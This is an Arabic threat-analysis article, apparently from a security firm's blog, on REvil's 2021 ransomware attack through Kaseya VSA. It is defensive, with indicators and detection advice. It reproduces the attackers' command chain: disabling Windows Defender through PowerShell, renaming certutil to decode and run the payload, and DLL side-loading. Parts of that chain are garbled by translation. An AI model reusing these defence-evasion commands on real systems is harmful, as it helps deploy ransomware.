🚀 أصبحت CloudSek أول شركة للأمن السيبراني من أصل هندي تتلقى استثمارات منها ولاية أمريكية صندوق
اقرأ المزيد

في 02 يوليو 2021، كشفت Kaseya، وهي شركة مطورة لحلول تكنولوجيا المعلومات تقدم خدماتها لمقدمي الخدمات المُدارة (MSPs)، أنها كانت ضحية لهجوم واسع النطاق من برامج الفدية. استهدف الهجوم، الذي نشرته مجموعة RaaS الشهيرة ReVil، البنية التحتية لـ VSA في Kaseya، مما عرض سلاسل التوريد الخاصة بها للخطر. استغلت مجموعة برامج الفدية ثغرة أمنية محددة في المصادقة في يوم الصفر في التطبيق لتحميل ملف ضار مشفر من Base64، مما أدى إلى إصابة البنية التحتية للعميل التي لديها برنامج وكيل VSA يعمل على الخوادم المستهدفة.
Kaseya's VSA هو برنامج للمراقبة والإدارة عن بعد (RMM) يمكّن MSPs من إجراء إدارة التصحيح والنسخ الاحتياطي ومراقبة العميل للعملاء. استفادت الجهات الفاعلة في مجال التهديد من ثغرة تجاوز المصادقة في يوم الصفر في واجهة الويب الخاصة بـ VSA، للحصول على جلسة مصادقة وتحميل حمولة وتنفيذ سلسلة من الأوامر عبر SQL للحصول على تنفيذ الأوامر. تم تسليم برنامج الفدية كتحديث للبرنامج يتنكر في صورة «إصلاح Kaseya VSA Agent Hot-fix». أدى هذا الإجراء إلى نشر مشفر، مما أدى إلى اختراق خادم VSA وتم إسقاطه في TempPath، تحت اسم الملف «agent.crt».
يتم إرسال ملف الحمولة «agent.crt» إلى برنامج مراقبة الوكيل (C:\PROGRAM FILES (X86)\ KASEYA\<ID>\ AGENTMON.EXE، حيث يكون المعرف هو مفتاح التعريف للخادم المتصل بمثيل الشاشة)، والذي يراقب نقاط نهاية العميل ويحدد ما إذا كانت المحطة تتطلب التصحيح أو التحديثات، فقط لتثبيتها بصمت في الخلفية. يقوم مراقب الوكيل بعد ذلك بكتابة «agent.crt» إلى دليل عمل وكيل VSA (C:\KWORKING\AGENT.crt).
«C:\WINDOWS\system32\cmd.exe" /c بينغ 127.0.0.1 -n 4979 > صفر &
C:\Windows\System32\WindowsPowerShell\v1.0\ powershell.exe Set-MP Preference - تعطيل المراقبة في الوقت الحقيقي $true - تعطيل نظام منع التسلل $ true - تعطيل حماية IOAV $ true - تعطيل مسح البرامج النصية $true - تمكين الوصول إلى المجلد الخاضع للرقابة معطل - تمكين وضع تدقيق حماية الشبكة - القوة - تم تعطيل الإبلاغ عن الخرائط - الموافقة على إرسال العينات - عدم إرسال العينات ونسخها مطلقًا /Y C:\Windows\System32\certutil.exe
C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & ldwide -فك شفرة البحث والتطوير & del /q /f → الإيماء والدانات C:\Windows\cert.exe c:\kworking\agent.crt c:\kworking\agent.exe c:\kworking\agent.crt C:\Windows\cert.exe c:\kworking\agent.exe
يتم استخدام الأمر التالي لتأخير أو تعطيل تنفيذ أوامر PowerShell:
«C:\WINDOWS\system32\cmd.exe" /c بينغ 127.0.0.1 -n 4979 > صفر
بعد ذلك، يتم تنفيذ أمر PowerShell بواسطة شاشة العامل، كما هو موضح أدناه:
C:\Windows\System32\WindowsPowerShell\v1.0\ powershell.exe تعيين التفضيلات
تعمل هذه الأوامر على تعطيل الحماية المختلفة المطبقة على النظام المستهدف، وتحديدًا ميزات Windows Defender، مثل حماية الشبكة، و iOfficeAntivirus (IOAV)، ومسح البرامج النصية، وإعداد تقارير MAPS، وما إلى ذلك.
يقوم الأمر التالي بإنشاء نسخة من ملف «certutil.exe»، وهو أداة مساعدة لإدارة الشهادات موجودة في جميع إصدارات Windows، من الموقع الافتراضي إلى دليل Windows وإعادة تسميته باسم «cert.exe»:
نسخة /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe
يقوم سطر الأوامر هذا بإلحاق بيانات عشوائية بنهاية ملف cert.exe لتغيير توقيعه، مما يساعد على تجنب منتجات أمان مكافحة البرامج الضارة:
إيكو %راندوم% >> C:\Windows\cert.exe
يقوم الأمر التالي بفك تشفير ملف «agent.crt» إلى «agent.exe»:
C:\Windows\cert.exe -فك شفرة c:\kworking\agent.crt c:\kworking\agent.exe
بعد ذلك، يقوم سطر الأوامر هذا بتنظيف الملف وتنفيذ «agent.exe»:
del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & # 8 c:\kworking\agent.exe
Agent.exe عبارة عن قطارة تقوم بتنزيل العناصر التالية:
وصف القطع الأثرية Msmpeng.exe مكون ويندوز ديفندر موقّع من قبل MicrosoftMpsvc.dll جزء من MsMpEng.exeيستخدم Revil إصدارًا معينًا من "MsMpEng.exe «، وهو عرضة للتحميل الجانبي لمكتبة الارتباط الديناميكي (DLL)، وهي طريقة هجوم إلكتروني شائعة تستفيد من كيفية تعامل التطبيقات مع ملفات DLL. يستخدم ملفات DLL الضارة بدلاً من الملفات الشرعية، والتي يتم تحميلها وتنفيذها بعد ذلك، مما يؤدي إلى إصابة الخادم المستهدف.
يتم إخفاء خزانة برامج الفدية في ملف «mpsvc.dll» ويتم تنفيذها عندما يتم تنفيذ «MsMpEng.exe» بواسطة الملف «agent.exe». هذا هو تكتيك التهرب الذي يستخدمه الفاعل المهدد لتجاوز الفحوصات الأمنية.
C:\Windows\cert.exe
(ملاحظة: استخدام هذه التجزئة غير فعال لأنها نسخة عشوائية مضافة من ملف certutil.exe. يجب عليك استخدام الاكتشاف القائم على السلوك، على سبيل المثال، إعادة تسمية/نسخ certutil.exe)
C:\windows\msmpeng.exe
(ملاحظة: هذا الملف هو إصدار قديم من Windows Defender. إنه ثنائي شرعي، ولكن يتم استخدامه لأغراض ضارة من قبل الخصوم مثل غيرهم من أدوات العيش خارج الأرض.)
C:\Program الملفات (x86)\ Kaseya\<ID>\ AgentMon.exe (الملف الثنائي الشرعي لـ VSA المستخدم للتنفيذ عن بُعد)
النطاقات https://github.com/pgl/kaseya-revil-cnc-domains/blob/main/revil-kaseya-cnc-domains.txtYARA القواعد https://github.com/cado-security/DFIR_Resources_REvil_Kaseya/blob/main/IOCs/Yara.rulesRegistry المفاتيح_المحلية_الآلة/البرنامج\ Wow6432Node\ BlackLivesMatter
المراجع
https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident
https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/